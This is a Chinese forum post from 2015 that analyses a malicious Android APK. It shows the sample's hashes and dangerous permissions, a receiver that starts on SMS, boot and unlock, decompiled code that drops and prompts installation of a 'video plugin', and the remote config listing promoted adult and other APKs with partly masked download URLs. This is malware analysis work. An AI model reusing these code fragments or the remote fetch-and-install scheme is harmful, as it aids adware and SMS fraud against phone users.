本帖最后由 kangkai 于 2015-10-22 01:04 编辑
一、样本信息 File: C:\Users\mattpeng\Desktop\demowy.apk Size: 1431275 bytes Modified: 2015年10月21日, 22:46:11 MD5: 682BE9D3335D21A****31FC3915B4E2 SHA1:0DCAA12742FA62586D4070DD1EA47579D9A0E38E CRC32: 747F4DA5 PackAge: com.fywx.video
一、具体分析
1. 查看AndroidManifest.xml配置文件,很幸运,没有进行加固处理。可以发现赋予了病毒非常多的权限,且是高危的权限,例如发送短信、拨打电话、读取日志文件、重启应用程序等等
[XML] 纯文本查看 复制代码 <uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
<uses-permission android:name="com.android.launcher.permission.UNINSTALL_SHORTCUT"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
<uses-permission android:name="android.permission.ACCESS_DOWNLOAD_MANAGER"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
<uses-permission android:name="android.permission.RESTART_PACKAGES"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.RECEIVE_WAP_PUSH"/>
<uses-permission android:name="android.permission.CHANGE_CONFIGURATION"/>
<uses-permission android: name="android.permission.VIBRATE"/>
<uses-permission android:name="android.permission.RUN_INSTRUMENTATION"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
2. 当手机接收到短信、开机、解锁时就会启动程序
[XML] 纯文本查看 复制代码 <service android:name="com.android.video1.MainService" android:enabled="true" />
<receiver android:name="com.fy.fy_sdk.FPayReceiver">
<intent-filter android:priority="2147483647">
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.USER_PRESENT" />
</intent-filter>
3. 我们先来com.android.video1.MainService处看看往下翻,发现一个比较重要判断跳转
[Python] 纯文本查看 复制代码 if-nez v1, :cond_3[/align]
const-string v1, "Video1.MainActivity"
const-string v2, "Star MainService"看下源代码:
[Java] 纯文本查看 复制代码 if (!a.a)
{
Log.e("Video1.MainActivity", "Star MainService");
localObject = new Intent("com.android.video1.install_from_shortcut");
((Intent)localObject).setClass(this, MainService.class);
((Intent)localObject).putExtra("shortcutid", paramBundle);
startService((Intent)localObject);
[align=left]}
我们再看看判断条件的内容,改判断内容主要是判断手机中是否已经安装了改应用,如果安装了,则跳过安装,执行下一步;若为安装装则执行安装
[Asm] 纯文本查看 复制代码 const-string v0, "Check install"[/align]
const-string v1, "check"
invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
invoke-virtual {p0}, Landroid/app/Activity;->getPackageManager()Landroid/content/pm/PackageManager;const-string v3, "video.apk"
invoke-direct {v1, v2, v3}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
sput-object v1, Lcom/fywx/a/a;->e:Ljava/io/File;
sget-object v1, Lcom/fywx/a/a;->e:Ljava/io/File;
invoke-virtual {v1}, Ljava/io/File;->exists()Z
move-result v1
if-nez v1, :cond_0
new-instance v1, Ljava/io/FileOutputStream;
sget-object v2, Lcom/fywx/a/a;->e:Ljava/io/File;
invoke-direct {v1, v2}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
const/16 v2, 0x400
new-array v2, v2, [B
:goto_0
invoke-virtual {v0, v2}, Ljava/io/InputStream;->read([B)I
move-result v3
if-gtz v3, :cond_2
invoke-virtual {v1}, Ljava/io/FileOutputStream;->close()V
invoke-virtual {v0}, Ljava/io/InputStream;->close()V
:try_end_0
.catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
:cond_0
:goto_1
new-instance v0, Landroid/app/AlertDialog$Builder;
invoke-direct {v0, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V
sput-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;
sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;
new-instance v1, Landroid/graphics/drawable/BitmapDrawable;
const-string v2, "/res/drawable-hdpi/ic_launcher.png"
invoke-static {v2}, Ljava/lang/ClassLoader;->getSystemResourceAsStream(Ljava/lang/String;)Ljava/io/InputStream;
move-result-object v2
invoke-direct {v1, v2}, Landroid/graphics/drawable/BitmapDrawable;-><init>(Ljava/io/InputStream;)V
invoke-virtual {v0, v1}, Landroid/app/AlertDialog$Builder;->setIcon(Landroid/graphics/drawable/Drawable;)Landroid/app/AlertDialog$Builder;
sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;
invoke-virtual {v0, v5}, Landroid/app/AlertDialog$Builder;->setCancelable(Z)Landroid/app/AlertDialog$Builder;
sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;
const-string v1, "\u5b89\u88c5\u89c6\u9891\u4e0b\u8f7d\u63d2\u4ef6\u63d0\u793a"
invoke-virtual {v0, v1}, Landroid/app/AlertDialog$Builder;->setTitle(Ljava/lang/CharSequence;)Landroid/app/AlertDialog$Builder;
sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;
const-string v1, "\u60a8\u9700\u8981\u5b89\u88c5\u89c6\u9891\u63d2\u4ef6\u624d\u53ef\u4ee5\u89c2\u770b\u672c\u5e94\u7528\u5185\u7684\u5404\u79cd\u6fc0\u60c5\u89c6\u9891\u3002\u662f\u5426\u5b89\u88c5\u89c6\u9891\u63d2\u4ef6\uff1f"
invoke-virtual {v0, v1}, Landroid/app/AlertDialog$Builder;->setMessage(Ljava/lang/CharSequence;)Landroid/app/AlertDialog$Builder;
sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;
const-string v1, "\u5b89\u88c5"
new-instance v2, Lcom/fywx/a/b;
invoke-direct {v2, p0}, Lcom/fywx/a/b;-><init>(Landroid/app/Activity;)V
invoke-virtual {v0, v1, v2}, Landroid/app/AlertDialog$Builder;->setPositiveButton(Ljava/lang/CharSequence;Landroid/content/DialogInterface$OnClickListener;)Landroid/app/AlertDialog$Builder;
sget-object v0, Lcom/fywx/a/a;->c:Landroid/app/AlertDialog$Builder;
const-string v1, "\u53d6\u6d88"
执行完判断条件后,回到MainActiviy,继续往下走来到MainService
在MainService第一行就是.field public static a:Lcom/android/video1/z,那我们就到.field public statica:Lcom/android/video1/z中看看
很幸运看到了一个新建对象,及常量字符串
[Asm] 纯文本查看 复制代码 new-instance v0, Lorg/apache/http/client/methods/HttpGet;
new-instance v3, Ljava/lang/StringBuilder; // 新建一个StringBuilder对象
const-string v4, [url=http://adverapk.oss-cn-beijing.aliyuncs.com/config%2]http://adverapk.****.aliyuncs.com/config%2[/url]******.txt?将这个链接下来看看具体是什么,里面全是推广的app
[XML] 纯文本查看 复制代码 {
"PopStartTime": "20",
"PopTime": "30",
"FlashStartTime": "15",
"ImageStartTime": "60",
"ImageTime": "60",
"AdItem": [
{
"Id": "10461",
"Name": "无码爽播",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "2",
"Intro": "",
"Size": "1385",
"MD5": "93F6FE9390216A40A357713954938599",
"Delay": "2",
"PackageName": "tfdufhkx.msmuycsd.yggfvnsb",
"Activity": "com.dm.ts.DmtestActivity",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2Fshipin.apk",
"IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2F12.png"
},
{
"Id": "10462",
"Name": "成人小说",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "5",
"Intro": "成人小说",
"Size": "2404",
"MD5": "484B0AFDA43EFEF0C65B967CAF36B212",
"IconAdd": "",
"PackageName": "jxrnyg.bcolovo.kbkbyf",
"Activity": "com.atnl.adultnovel.book.activity.StateAcitvity",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fxiaoshuo%2Fchengrenxiaoshou.apk",
"FullImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fxiaoshuo%2Fcr.png"
},
{
"Id": "10473",
"Name": "无码爽播",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "5",
"Intro": "无码爽播",
"Size": "1385",
"MD5": "93F6FE9390216A40A357713954938599",
"IconAdd": "",
"PackageName": "tfdufhkx.msmuycsd.yggfvnsb",
"Activity": "com.dm.ts.DmtestActivity",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2Fshipin.apk",
"FullImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2F0000.png"
},
{
"Id": "10465",
"Name": "全民酷跑",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "3",
"Intro": "全民酷跑",
"Size": "8254",
"MD5": "C8F8643EAF93F870F999BCD8175FC872",
"IconAdd": "",
"PackageName": "com.ezgame.skater",
"Activity": "com.snowfish.cn.ganga.offline.helper.SFGameSplashActivity",
"APKAdd": "http://adverapk.*********.aliyuncs.com/apks%2Fquanmingkupao%2Fquanmingkupao.apk",
"PopImgAdd": [
"http://adverapk.*********.aliyuncs.com/qudao%2Fhlq%2Fqmkp%2F5.jpg"
]
},
{
"Id": "10466",
"Name": "成人小说",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "2",
"Intro": "",
"Size": "2404",
"MD5": "484B0AFDA43EFEF0C65B967CAF36B212",
"Delay": "2",
"PackageName": "jxrnyg.bcolovo.kbkbyf",
"Activity": "com.atnl.adultnovel.book.activity.StateAcitvity",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fxiaoshuo%2Fchengrenxiaoshou.apk",
"IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffx%2Fshipin%2F1.jpg"
},
{
"Id": "10469",
"Name": "桃桃斗地主",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "3",
"Intro": "美女和你一起斗地主桃桃斗地主",
"Size": "9850",
"MD5": "2E6ADDBDF0CC422DAFC6D97D13C62192",
"IconAdd": "",
"PackageName": "com.meiqu.ddzdj.zimon",
"Activity": "com.open.sdk.DoActivity",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fqxjwl%2Ftaotaodoudizhu%2Ftaotao.apk",
"PopImgAdd": [
"http://adverapk.*********.aliyuncs.com/qudao%2Fqxjwl%2Ftaotaodoudizhu%2Fdoulun.png"
]
},
{
"Id": "10472",
"Name": "万能WIFI",
"Intro": "万能WIFI,让你随时随地上网",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "1",
"Size": "548",
"MD5": "3D1FE5B1F4051BD40228E18DBFCC571C",
"Delay": "14",
"PackageName": "inspnmm.xhx.neets",
"Activity": "com.huluxia.wifi.MainActivity",
"IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fwifi%2Fwifi.png",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fwifi%2Fwifi100902.apk",
"NotifyImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fwifi%2Faaa.png"
},
{
"Id": "10485",
"Name": "超级加速器",
"Intro": "一款专注于手机内存清理、优化的超级加速软件,强力、持久释放内存",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "1",
"Size": "843",
"MD5": "3D1FE5B1F4051BD40228E18DBFCC571C",
"Delay": "14",
"PackageName": "com.apusapps.tools.boosterfq",
"Activity": "com.apusapps.tools.booster.ui.BoostMainActivity",
"IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fchaojijiasuqi%2Ficon.png",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fchaojijiasuqi%2Fchaoji.apk",
"NotifyImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fchaojijiasuqi%2FL.png"
},
{
"Id": "10478",
"Name": "夫妻笑话大湿",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "2",
"Intro": "",
"Size": "2",
"MD5": "7af8f2a17c40694ecca4be1533ae29d1",
"Delay": "2",
"PackageName": "com.mobapp.jokecouble21013",
"Activity": "com.mobapp.jokecouble.WelcomeActivity",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffuqixiaohuadashi%2Fjoke100901.apk",
"IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Ffuqixiaohuadashi%2Ficon.png"
},
{
"Id": "10482",
"Name": "高清直播",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "5",
"Intro": "日韩美随你看。。",
"Size": "1077",
"MD5": "e4e97d05ee8ba44fa5e4fc91f2dd9c8b",
"IconAdd": "",
"PackageName": "com.dsedsa.sdgfrtd",
"Activity": "com.icon.IconActivity",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fgaoqinzhibo%2Fgaoqin.apk",
"FullImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fgaoqinzhibo%2Fq.png"
},
{
"Id": "10483",
"Name": "寂寞快播",
"Intro": "夜深的时候,看片神器",
"Size": "1187",
"MD5": "ae59592d3d2e1c590f9c605c6b8a6b30",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "9",
"Align": "down",
"PackageName": "KI6k.Dc0O.Xh7R.E894",
"Activity": "com.xiaochen.android.yyeuw.ui.UserNavAct",
"IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fjimokuaibo%2Fic_launcher.png",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fjimokuaibo%2Fkuaibo.apk",
"ImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fjimokuaibo%2Fm.gif"
},
{
"Id": "10480",
"Name": "泡泡龙",
"Intro": "饭后一起打泡泡吧",
"Size": "6482",
"MD5": "986527388747090a9e7e44411bcaafe9",
"Operator": "中国移动,中国联通,中国电信",
"Province": "安徽,广西,贵州,海南,河北,黑龙江,湖北,吉林,辽宁,内蒙古,宁夏,青海,天津,西藏,新疆,云南",
"Type": "9",
"Align": "top",
"PackageName": "com.fireflygame.popolong.tp",
"Activity": "org.cocos2dx.cpp.AppActivity",
"IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fpaopaolong%2FICON.png",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fpaopaolong%2Fpaopao.apk",
"ImgAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Fpaopaolong%2Fp.png"
},
{
"Id": "10484",
"Name": "辣妹影院",
"Operator": "中国移动,中国联通,中国电信",
"Province": "0",
"Type": "2",
"Intro": "",
"Size": "2",
"MD5": "906273646affdbcc222da97c001a0216",
"Delay": "2",
"PackageName": "com.g.ees.appab",
"Activity": "com.g.ees.appab.BrowseActivity",
"APKAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Flameiyy%2Flamei.apk",
"IconAdd": "http://adverapk.*********.aliyuncs.com/qudao%2Flameiyy%2Ficon.png"
}
]
} |
发表于 2015-10-22 00:56
|
发表于 2015-10-28 16:22
发表于 2015-10-22 08:13
发表于 2015-10-23 09:30
